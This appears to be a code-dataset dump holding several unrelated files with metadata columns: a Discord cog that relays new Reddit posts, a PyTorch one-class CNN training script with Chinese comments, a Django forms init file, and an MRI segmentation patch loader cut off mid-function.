async def resend(self, ctx):
"""Command to resend the last post again.
Invoked with !resend"""
# log command in console
print("Received resend command")
# respond to command
await ctx.send("Resending last announcement!")
# check for last submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=1):
# process submission
await RedditPost(self.bot, submission).process_post()
@loop(seconds=CHECK_INTERVAL)
async def reddit_feed(self):
"""loop every few seconds to check for new submissions"""
try:
# check for new submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=SUBMISSION_LIMIT):
# check if the post has been seen before
if not submission.saved:
# save post to mark as seen
await submission.save()
# process submission
await RedditPost(self.bot, submission).process_post()
except AsyncPrawcoreException as err:
print(f"EXCEPTION: AsyncPrawcoreException. {err}")
time.sleep(10)
@reddit_feed.before_loop
async def reddit_feed_init(self):
"""print startup info before reddit feed loop begins"""
print(f"Logged in: {str(datetime.datetime.now())[:-7]}")
print(f"Timezone: {time.tzname[time.localtime().tm_isdst]}")
print(f"Subreddit: {config.SUB}")
print(f"Checking {SUBMISSION_LIMIT} posts every {CHECK_INTERVAL} seconds")
def setup(bot):
bot.add_cog(RedditFeedCog(bot)) | en | 0.907682 | # Reddit feed settings # seconds to wait before checking again # number of submissions to check # initialize AsyncPraw reddit api Checks for `resend` command and starts Reddit feed loop to check submissions When discord is connected # Start Reddit loop check that command is in a guild Command to resend the last post again. Invoked with !resend # log command in console # respond to command # check for last submission in subreddit # process submission loop every few seconds to check for new submissions # check for new submission in subreddit # check if the post has been seen before # save post to mark as seen # process submission print startup info before reddit feed loop begins | 3.000928 | 3 |
Working/oc-cnn-master-Q/src/main/train_Q.py | QUANHAO-NCU/pytorch-visual-block | 1 | 6616719 | import torch
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as func
import torchvision.models as models
import torchvision.transforms as transforms
import pickle as cp
import matplotlib.pyplot as plt
from subprocess import call
import visdom
from Config import *
from classifier import *
import cv2
import scipy.io
from scipy import misc
from sklearn import svm
from sklearn import metrics
import joblib
from sklearn.metrics import accuracy_score
import sys
import copy
import h5py
import time
import pickle
import os
import random
import argparse
import numpy as np
from light_cnn import *
from oneClassDataset import OneClassDataset
from classifier import classifier_nn
import torch.optim as optim
import torchvision
from torch.utils.data import DataLoader
from tqdm import tqdm
from Config import *
import VGG_FACE_torch
def getExtractor(model_type, pre_trained_flag):
if model_type == 'alexnet':
model = torchvision.models.alexnet(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-2])
model.classifier = new_classifier
elif model_type == 'vgg16':
model = torchvision.models.vgg16(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19':
model = torchvision.models.vgg19(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg16bn':
model = torchvision.models.vgg16_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19bn':
model = torchvision.models.vgg19_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'resnet18':
model = torchvision.models.resnet18(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet34':
model = torchvision.models.resnet34(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet50':
model = torchvision.models.resnet50(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'vggface':
model = VGG_FACE_torch.VGG_FACE_torch
model.load_state_dict(torch.load('VGG_FACE.pth'))
model = model[:-3]
elif model_type == 'lightcnn':
model = LightCNN_29Layers_v2(num_classes=80013)
model = torch.nn.DataParallel(model)
model.load_state_dict(torch.load('LightCNN_29Layers_V2_checkpoint.pth')['state_dict'])
new_model = nn.Sequential(*list(model.module.children())[:-1])
else:
raise argparse.ArgumentTypeError(
'models supported in this version of code are alexnet, vgg16, vgg19, vgg16bn, vgg19bn. \n '
'Enter model_type as one fo this argument')
return model
def addGaussianNoise(FeatureVectors, input_label, mean=0, std=0.01, shuffle=True):
# 一个正常输入对应一个噪声
noiseLabel = torch.zeros(len(FeatureVectors))
gaussian_data = np.random.normal(mean, std, FeatureVectors.shape)
gaussian_data = torch.from_numpy(gaussian_data)
data = torch.cat((FeatureVectors, gaussian_data), dim=0)
labels = torch.cat((input_label, noiseLabel))
# 原论文没有的操作
# 将输入和噪声打乱
if shuffle:
tmp = []
for index, tensor in enumerate(data):
tmp.append([tensor, labels[index]])
random.shuffle(tmp)
data = [torch.unsqueeze(i[0], dim=0) for i in tmp]
labels = [i[1] for i in tmp]
data = torch.cat(data, dim=0)
return data, labels
def getClassifier(featureDimension):
return classifier_nn(featureDimension)
def OCCNN_train(params):
datasetPath = params.datasetPath
positiveClass = params.positiveClass
extractor = params.extractor
extractor_pretrain = params.extractor_pretrain
batch_size = params.batch_size
num_workers = params.num_workers
featureDimension = params.D
lr = params.lr
epochs = params.epochs
gpu = params.gpu_flag
#####################################################################
train_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='train'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='val'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
test_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='test'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
model = getExtractor(extractor, extractor_pretrain)
classifier = getClassifier(featureDimension)
InstanceNormal = nn.InstanceNorm1d(1, affine=False)
relu = nn.ReLU()
loss_function = nn.CrossEntropyLoss()
model_optimizer = optim.Adam(model.classifier.parameters(), lr=lr)
classifier_optimizer = optim.Adam(classifier.parameters(), lr=lr)
if gpu:
device = torch.device('cuda:0')
model = model.to(device)
classifier = classifier.to(device)
relu = relu.to(device)
loss_function = loss_function.to(device)
# 记录信息
iteration = []
train_loss_iter = []
val_acc_iter = []
best_weights = ''
best_acc = 0
global_step = 1
for epoch in range(epochs):
model.train()
count_loss = 0
with tqdm(total=len(train_loader),
desc=f'{extractor} Epoch:{epoch}/{epochs};Iteration :{len(train_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(train_loader):
image, label = image.to(device), label.to(device)
# 给图像添加高斯噪声
# 提取特征向量,进行像素上的归一化
featureVectors = model(image)
featureVectors = featureVectors.view(batch_size, 1, featureDimension)
featureVectors = InstanceNormal(featureVectors)
featureVectors = featureVectors.view(batch_size, featureDimension)
# 特征向量添加高斯噪声
data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(data)
out = classifier(data)
# 梯度清零
model_optimizer.zero_grad()
classifier_optimizer.zero_grad()
# 计算loss
loss = loss_function(out, labels)
count_loss += loss.item()
# 反向传播
loss.backward()
# 更新参数
model_optimizer.step()
classifier_optimizer.step()
global_step += 1
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
# 验证集,使用评估模式,该模式下神经网络不会记录梯度
val_acc = evaluate(model, classifier, val_loader)
iteration.append(epoch + 1)
train_loss_iter.append(count_loss / (step + 1))
val_acc_iter.append(val_acc)
# 输出验证信息
print('val acc:%.4f' % val_acc)
# 保存网络状态
if val_acc > best_acc:
best_acc = val_acc
if os.path.exists(best_weights):
# 删除之前保存的权值文件
os.remove(best_weights)
torch.save(model.state_dict(),
f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
best_weights = f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth'
print(f'save Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
def evaluate(extractor, classifier, val_loader):
extractor.eval()
classifier.eval()
device = torch.device('cuda:0')
count_loss = 0
relu = nn.ReLU()
correct = 0
total = len(val_loader)
with tqdm(total=len(val_loader),
desc=f';Iteration :{len(val_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(val_loader):
image, label = image.to(device), label.to(device)
# 测试不用加噪声
featureVectors = extractor(image)
# data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(featureVectors)
out = classifier(data)
# 计算loss
predict = out.argmax(dim=1)
correct += torch.eq(predict, label).float().sum().item()
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
return correct / (total * val_loader.batch_size)
if __name__ == '__main__':
image = torch.randn((32, 3, 28, 28))
# image_val_ex = torch.randn((1, 3, 224, 224))
# modelvgg16 = getExtractor('vgg16', True)
# modelvgg19 = getExtractor('vgg19', True)
# modelAlex = getExtractor('alexnet', True)
#
# modelResNet = getExtractor('resnet18', True)
# out1 = modelResNet(image)
# modelResNet = torchvision.models.resnet34(True)
# modelResNet = torchvision.models.resnet50(True)
OCCNN_train(trainArgs())
out = image.view(32, 20)
print(out.shape)
| import torch
import torchvision
import torch
import torch.nn as nn
import torch.nn.functional as func
import torchvision.models as models
import torchvision.transforms as transforms
import pickle as cp
import matplotlib.pyplot as plt
from subprocess import call
import visdom
from Config import *
from classifier import *
import cv2
import scipy.io
from scipy import misc
from sklearn import svm
from sklearn import metrics
import joblib
from sklearn.metrics import accuracy_score
import sys
import copy
import h5py
import time
import pickle
import os
import random
import argparse
import numpy as np
from light_cnn import *
from oneClassDataset import OneClassDataset
from classifier import classifier_nn
import torch.optim as optim
import torchvision
from torch.utils.data import DataLoader
from tqdm import tqdm
from Config import *
import VGG_FACE_torch
def getExtractor(model_type, pre_trained_flag):
if model_type == 'alexnet':
model = torchvision.models.alexnet(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-2])
model.classifier = new_classifier
elif model_type == 'vgg16':
model = torchvision.models.vgg16(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19':
model = torchvision.models.vgg19(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg16bn':
model = torchvision.models.vgg16_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'vgg19bn':
model = torchvision.models.vgg19_bn(pretrained=pre_trained_flag)
new_classifier = nn.Sequential(*list(model.classifier.children())[:-3])
model.classifier = new_classifier
elif model_type == 'resnet18':
model = torchvision.models.resnet18(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet34':
model = torchvision.models.resnet34(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'resnet50':
model = torchvision.models.resnet50(pretrained=pre_trained_flag)
model.fc = nn.Sequential()
elif model_type == 'vggface':
model = VGG_FACE_torch.VGG_FACE_torch
model.load_state_dict(torch.load('VGG_FACE.pth'))
model = model[:-3]
elif model_type == 'lightcnn':
model = LightCNN_29Layers_v2(num_classes=80013)
model = torch.nn.DataParallel(model)
model.load_state_dict(torch.load('LightCNN_29Layers_V2_checkpoint.pth')['state_dict'])
new_model = nn.Sequential(*list(model.module.children())[:-1])
else:
raise argparse.ArgumentTypeError(
'models supported in this version of code are alexnet, vgg16, vgg19, vgg16bn, vgg19bn. \n '
'Enter model_type as one fo this argument')
return model
def addGaussianNoise(FeatureVectors, input_label, mean=0, std=0.01, shuffle=True):
# 一个正常输入对应一个噪声
noiseLabel = torch.zeros(len(FeatureVectors))
gaussian_data = np.random.normal(mean, std, FeatureVectors.shape)
gaussian_data = torch.from_numpy(gaussian_data)
data = torch.cat((FeatureVectors, gaussian_data), dim=0)
labels = torch.cat((input_label, noiseLabel))
# 原论文没有的操作
# 将输入和噪声打乱
if shuffle:
tmp = []
for index, tensor in enumerate(data):
tmp.append([tensor, labels[index]])
random.shuffle(tmp)
data = [torch.unsqueeze(i[0], dim=0) for i in tmp]
labels = [i[1] for i in tmp]
data = torch.cat(data, dim=0)
return data, labels
def getClassifier(featureDimension):
return classifier_nn(featureDimension)
def OCCNN_train(params):
datasetPath = params.datasetPath
positiveClass = params.positiveClass
extractor = params.extractor
extractor_pretrain = params.extractor_pretrain
batch_size = params.batch_size
num_workers = params.num_workers
featureDimension = params.D
lr = params.lr
epochs = params.epochs
gpu = params.gpu_flag
#####################################################################
train_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='train'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='val'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
test_loader = DataLoader(
OneClassDataset(path=datasetPath, positiveClass=positiveClass, mode='test'),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
model = getExtractor(extractor, extractor_pretrain)
classifier = getClassifier(featureDimension)
InstanceNormal = nn.InstanceNorm1d(1, affine=False)
relu = nn.ReLU()
loss_function = nn.CrossEntropyLoss()
model_optimizer = optim.Adam(model.classifier.parameters(), lr=lr)
classifier_optimizer = optim.Adam(classifier.parameters(), lr=lr)
if gpu:
device = torch.device('cuda:0')
model = model.to(device)
classifier = classifier.to(device)
relu = relu.to(device)
loss_function = loss_function.to(device)
# 记录信息
iteration = []
train_loss_iter = []
val_acc_iter = []
best_weights = ''
best_acc = 0
global_step = 1
for epoch in range(epochs):
model.train()
count_loss = 0
with tqdm(total=len(train_loader),
desc=f'{extractor} Epoch:{epoch}/{epochs};Iteration :{len(train_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(train_loader):
image, label = image.to(device), label.to(device)
# 给图像添加高斯噪声
# 提取特征向量,进行像素上的归一化
featureVectors = model(image)
featureVectors = featureVectors.view(batch_size, 1, featureDimension)
featureVectors = InstanceNormal(featureVectors)
featureVectors = featureVectors.view(batch_size, featureDimension)
# 特征向量添加高斯噪声
data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(data)
out = classifier(data)
# 梯度清零
model_optimizer.zero_grad()
classifier_optimizer.zero_grad()
# 计算loss
loss = loss_function(out, labels)
count_loss += loss.item()
# 反向传播
loss.backward()
# 更新参数
model_optimizer.step()
classifier_optimizer.step()
global_step += 1
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
# 验证集,使用评估模式,该模式下神经网络不会记录梯度
val_acc = evaluate(model, classifier, val_loader)
iteration.append(epoch + 1)
train_loss_iter.append(count_loss / (step + 1))
val_acc_iter.append(val_acc)
# 输出验证信息
print('val acc:%.4f' % val_acc)
# 保存网络状态
if val_acc > best_acc:
best_acc = val_acc
if os.path.exists(best_weights):
# 删除之前保存的权值文件
os.remove(best_weights)
torch.save(model.state_dict(),
f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
best_weights = f'{extractor}-Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth'
print(f'save Epoch_{epoch + 1}-loss{round(count_loss / step + 1, 4)}-val acc_{round(val_acc, 4)}.pth')
def evaluate(extractor, classifier, val_loader):
extractor.eval()
classifier.eval()
device = torch.device('cuda:0')
count_loss = 0
relu = nn.ReLU()
correct = 0
total = len(val_loader)
with tqdm(total=len(val_loader),
desc=f';Iteration :{len(val_loader)}',
postfix=dict, mininterval=0.5) as train_bar:
for step, (image, label) in enumerate(val_loader):
image, label = image.to(device), label.to(device)
# 测试不用加噪声
featureVectors = extractor(image)
# data, labels = addGaussianNoise(featureVectors, label, shuffle=False)
data = relu(featureVectors)
out = classifier(data)
# 计算loss
predict = out.argmax(dim=1)
correct += torch.eq(predict, label).float().sum().item()
train_bar.set_postfix(**{'loss': count_loss / (step + 1)})
train_bar.update(1)
return correct / (total * val_loader.batch_size)
if __name__ == '__main__':
image = torch.randn((32, 3, 28, 28))
# image_val_ex = torch.randn((1, 3, 224, 224))
# modelvgg16 = getExtractor('vgg16', True)
# modelvgg19 = getExtractor('vgg19', True)
# modelAlex = getExtractor('alexnet', True)
#
# modelResNet = getExtractor('resnet18', True)
# out1 = modelResNet(image)
# modelResNet = torchvision.models.resnet34(True)
# modelResNet = torchvision.models.resnet50(True)
OCCNN_train(trainArgs())
out = image.view(32, 20)
print(out.shape)
| zh | 0.412766 | # 一个正常输入对应一个噪声 # 原论文没有的操作 # 将输入和噪声打乱 ##################################################################### # 记录信息 # 给图像添加高斯噪声 # 提取特征向量,进行像素上的归一化 # 特征向量添加高斯噪声 # 梯度清零 # 计算loss # 反向传播 # 更新参数 # 验证集,使用评估模式,该模式下神经网络不会记录梯度 # 输出验证信息 # 保存网络状态 # 删除之前保存的权值文件 # 测试不用加噪声 # data, labels = addGaussianNoise(featureVectors, label, shuffle=False) # 计算loss # image_val_ex = torch.randn((1, 3, 224, 224)) # modelvgg16 = getExtractor('vgg16', True) # modelvgg19 = getExtractor('vgg19', True) # modelAlex = getExtractor('alexnet', True) # # modelResNet = getExtractor('resnet18', True) # out1 = modelResNet(image) # modelResNet = torchvision.models.resnet34(True) # modelResNet = torchvision.models.resnet50(True) | 2.137028 | 2 |
src/cms/forms/authentication/__init__.py | S10MC2015/cms-django | 0 | 6616720 | <filename>src/cms/forms/authentication/__init__.py
"""
Forms related to the user and password management
"""
from .password_reset_form import PasswordResetConfirmForm
| <filename>src/cms/forms/authentication/__init__.py
"""
Forms related to the user and password management
"""
from .password_reset_form import PasswordResetConfirmForm
| en | 0.947168 | Forms related to the user and password management | 1.297676 | 1 |
examples/image/cath/datasets/to_ignore/MRI/mri.py | mariogeiger/se3cnn | 170 | 6616721 | # pylint: disable=C,R,E1101
import torch
import h5py
import numpy as np
import numbers
import sys
miccai_filters = {
'train': ["1000_3",
"1001_3",
"1002_3",
"1006_3",
"1007_3",
"1008_3",
"1009_3",
"1010_3",
"1011_3",
"1012_3",
"1013_3",
"1014_3"],
'validation': ["1015_3",
"1017_3",
"1036_3"],
'test': ["1003_3",
"1004_3",
"1005_3",
"1018_3",
"1019_3",
"1023_3",
"1024_3",
"1025_3",
"1038_3",
"1039_3",
"1101_3",
"1104_3",
"1107_3",
"1110_3",
"1113_3",
"1116_3",
"1119_3",
"1122_3",
"1125_3",
"1128_3"]
}
# check that filters are non-overlapping
assert len(set(miccai_filters['train']).intersection(miccai_filters['validation'])) == 0
assert len(set(miccai_filters['train']).intersection(miccai_filters['test'])) == 0
def get_miccai_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
**read_data_kwargs):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False,
**read_data_kwargs)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def get_mrbrains_dataloader(dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
batch_size,
num_workers,
pin_memory,
N_train):
if mode == 'train':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='train',
patch_shape=patch_shape,
patch_overlap=patch_overlap)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True)
np.set_printoptions(threshold=np.nan)
print(np.unique(data_set.labels[0]))
if mode in ['train', 'validation']:
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='validation',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
if mode == 'test':
data_set = MRISegmentation(dataset=dataset,
h5_filename=h5_filename,
mode='test',
patch_shape=patch_shape,
patch_overlap=patch_overlap,
randomize_patch_offsets=False)
data_loader = torch.utils.data.DataLoader(data_set,
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=False)
return data_set, data_loader
def read_h5_data(dataset, h5_filename, mode, **read_data_kwargs):
''' read MRI datasets from h5 files
:param dataset: selects miccai or mrbrains, the latter with either reduced or full labels
:param h5_filename: path to the h5 file
:param mode: load train, validation or test set
'''
assert dataset in ['miccai', 'mrbrains_reduced', 'mrbrains_full']
assert mode in ['train', 'validation', 'test']
if dataset == 'miccai':
return read_h5_data_miccai(h5_filename, mode, **read_data_kwargs)
else:
label_mode = dataset.split('_')[-1] # 'reduced' or 'full'
return read_h5_data_mrbrains(h5_filename, mode, label_mode, **read_data_kwargs)
def read_h5_data_miccai(h5_filename, mode, filter=None):
''' to be called from read_h5_data '''
data = []
labels = []
unpadded_data_spatial_shape = []
padding_boundary = []
patch_indices = []
if filter == None:
filter = miccai_filters.get(mode)
with h5py.File(h5_filename, 'r') as hf:
for name in filter:
# Assumption: voxel value and pixel are stored in last dim
signal_volume = hf[name][:][:,:,:,0].squeeze()[np.newaxis,...]
label_volume = hf[name][:][:,:,:,1].squeeze()
data.append(signal_volume)
labels.append(label_volume)
unpadded_data_spatial_shape.append(data[-1].shape[1:])
padding_boundary.append(None)
class_count = hf['class_counts'][:]
# signal_mean = hf['signal_mean'][:]
# signal_std = hf['signal_std'][:]
# bg_values = -signal_mean/signal_std # since original bg value was zero
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
def read_h5_data_mrbrains(h5_filename, mode, label_mode, N_train=4):
''' to be called from read_h5_data
training set is split into N_train training samples and 5-N_train validation samples
'''
with h5py.File(h5_filename, 'r') as hf:
if mode == 'train':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train)]
elif mode == 'validation':
data = [hf['train_signal_{}'.format(i)][()] for i in range(N_train, 5)]
labels = [hf['train_label_{}_{}'.format(label_mode, i)][()] for i in range(N_train, 5)]
elif mode == 'test':
data = [hf['test_signal_{}'.format(i)][()] for i in range(15)]
labels = None
class_count = hf['class_counts_{}'.format(label_mode)][:]
unpadded_data_spatial_shape = [d.shape[1:] for d in data]
padding_boundary = [None for d in data]
# channel_means = hf['channel_means'][:]
# channel_stds = hf['channel_stds'][:]
return data, labels, unpadded_data_spatial_shape, padding_boundary, class_count
class MRISegmentation(torch.utils.data.Dataset):
''' Read 3D medical image files in .nii format, and provide it to the
user as 3D patches of the requested size. Setting
randomize_patch_offsets=True will add random offsets to the
patches to reduce the affect of patch boundaries.
:param dataset: dataset to be loaded. options are 'miccai', 'mrbrains_reduced' and 'mrbrains_full'
:param h5_filename: path to the hdf5 file
:param mode: load 'train', 'validation' or 'test' set
:param patch_shape:
:param filter: optional - only for miccai select exactly which scans to load
:param randomize_patch_offsets:
# :param pad_mode:
:param pad_constant:
:param read_data_kwargs: keywordargs options for different datasets
used to pass `filter` for miccai and `N_train` for mrbrains
'''
def __init__(self,
dataset,
h5_filename,
mode,
patch_shape,
patch_overlap,
randomize_patch_offsets=True,
# pad_mode='constant',
# pad_constant=0,
**read_data_kwargs):
if isinstance(patch_shape, numbers.Integral):
patch_shape = np.repeat(patch_shape, 3)
if isinstance(patch_overlap, numbers.Integral):
patch_overlap = np.repeat(patch_overlap, 3)
self.patch_shape = patch_shape
self.patch_overlap = patch_overlap
self.randomize_patch_offsets = randomize_patch_offsets
# self.pad_mode = pad_mode
# self.pad_constant = pad_constant
# self.log10_signal = log10_signal
# Read H5 file
print("Reading data...", end="")
sys.stdout.flush()
self.data, self.labels, self.unpadded_data_spatial_shape, self.padding_boundary, self.class_count = \
read_h5_data(dataset, h5_filename, mode, **read_data_kwargs)
print("done.")
# This first call to initialize_patch_indices will calculate the
# total padding around each image, and store it in self.padding_boundary
self.initialize_patch_indices()
# The total padding is fixed to a multiple of the patch size - we
# can therefore add the full padding in the setup fase
print("Applying padding...", end="")
sys.stdout.flush()
for i, image in enumerate(self.data):
pad_width = self.padding_boundary[i]
# for data which contains a channel dimension add an entry to pad_width
if len(self.data[i].shape) == 4:
pad_width_data = np.insert(pad_width, 0, values=0, axis=0)
# self.data[i] = np.pad(self.data[i], pad_width_data,
# mode=self.pad_mode,
# constant_values=self.pad_constant)
# self.labels[i] = np.pad(self.labels[i], pad_width,
# mode=self.pad_mode,
# constant_values=self.pad_constant).astype(np.int64)
pad_mode = 'symmetric' # constant value padding unclear for some signal channels
self.data[i] = np.pad(self.data[i], pad_width_data, mode=pad_mode)
self.labels[i] = np.pad(self.labels[i], pad_width, mode=pad_mode).astype(np.int64)
print("done.")
# # optionally logarithmize zero shifted input signal
# if self.log10_signal:
# print('logarithmize signal')
# signal_min = min([np.min(data_i) for data_i in self.data])
# for i in range(len(self.data)):
# self.data[i] = np.log10(self.data[i] + signal_min + 1) # add 1 to prevent -inf from the log
def get_original(self, dataset_index):
"""Get full input image at specified index"""
size = self.unpadded_data_spatial_shape[dataset_index]
patch_index_start = self.padding_boundary[dataset_index][:,0]
patch_index_end = patch_index_start + size
patch_index = np.stack((patch_index_start, patch_index_end))
return (self.data[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]],
self.labels[dataset_index][patch_index[0, 0]:patch_index[1, 0],
patch_index[0, 1]:patch_index[1, 1],
patch_index[0, 2]:patch_index[1, 2]])
def initialize_patch_indices(self):
"""For each image, calculate the indices for each patch, possibly
shifted by a random offset"""
self.patch_indices = []
for i, image in enumerate(self.data):
patch_indices, overflow = self.calc_patch_indices(
self.unpadded_data_spatial_shape[i],
self.patch_shape,
overlap=self.patch_overlap,
randomize_offset=self.randomize_patch_offsets)
patch_indices = np.append(np.full(shape=(patch_indices.shape[0],1),
fill_value=i),
patch_indices, axis=1)
self.patch_indices += patch_indices.tolist()
# Keep track of how much each image has been padded
if self.padding_boundary[i] is None:
pad_width = np.stack([overflow, overflow], axis=1)
self.padding_boundary[i] = pad_width
def __getitem__(self, index):
"""Retrieve a single patch"""
# Which image to retrieve patch from
dataset_index = self.patch_indices[index][0]
# Extract image and label
image = self.data[dataset_index]
labels = self.labels[dataset_index]
# Obtain patch indices into original image
patch_index_start = np.array(self.patch_indices[index][1:],
dtype=np.int16)
patch_index_end = patch_index_start + self.patch_shape
patch_index = np.stack((patch_index_start, patch_index_end))
patch_valid = np.stack(patch_index).clip(
min=0, max=self.unpadded_data_spatial_shape[dataset_index]) - patch_index[0]
# Update patch indices to padded image
patch_index_padded = patch_index + self.padding_boundary[dataset_index][:,0]
# # OLD VERSION
# # assumed images not to have channel dimension yet and hence adds it
# Lookup image and add channel dimension
# image_patch = np.expand_dims(
# image[patch_index_padded[0, 0]:patch_index_padded[1, 0],
# patch_index_padded[0, 1]:patch_index_padded[1, 1],
# patch_index_padded[0, 2]:patch_index_padded[1, 2]],
# axis=0).astype(np.float32)
# Slice image patch
image_patch = image[:, patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]].astype(np.float32)
# Slice label patch and add dimension
labels_patch = np.expand_dims(
labels[patch_index_padded[0, 0]:patch_index_padded[1, 0],
patch_index_padded[0, 1]:patch_index_padded[1, 1],
patch_index_padded[0, 2]:patch_index_padded[1, 2]],
axis=0)
# print("image: ", image_patch)
# Check that patch has the correct size
assert np.all(image_patch[0].shape == self.patch_shape)
assert np.all(labels_patch[0].shape == self.patch_shape)
return image_patch, labels_patch, dataset_index, patch_index, patch_valid
def __len__(self):
return len(self.patch_indices)
@staticmethod
def calc_patch_indices(image_shape,
patch_shape,
overlap=0,
randomize_offset=True,
minimum_overflow_fraction=0.25):
"""
Given the image shape and the patch shape, calculate the placement
of patches. If randomize_offset is on, it will randomize the placement,
so that the patch boundaries affect different regions in each epoch.
There is natural room for this randomization whenever the image size
if not divisible by the patch size, in the sense that the overflow
can be placed arbitrarily in the beginning on the end. If you want
to ensure that some randomization will always occur, you can set
minimum_overflow_fraction, which will ensure that an extra patch will
be added to provide extra overflow if necessary.
:param image_shape: Shape if input image
:param patch_shape: Shape of patch
:param overlap: Allow patches to overlap with this number of voxels
:param randomize_offset: Whether patch placement should be normalized
:param minimum_overflow_fraction: Specify to force overflow beyond image
to be at least this fraction of the patch size
:return:
"""
if isinstance(overlap, numbers.Integral):
overlap = np.repeat(overlap, len(image_shape))
# Effective patch shape
eff_patch_shape = (patch_shape - overlap)
# Number of patches (rounding up)
n_patches = np.ceil((image_shape - patch_shape) / eff_patch_shape + 1).astype(int)
# Overflow of voxels beyond image
overflow = eff_patch_shape * n_patches - image_shape + overlap
if randomize_offset:
# Add extra patch for dimensions where minimum is below fraction
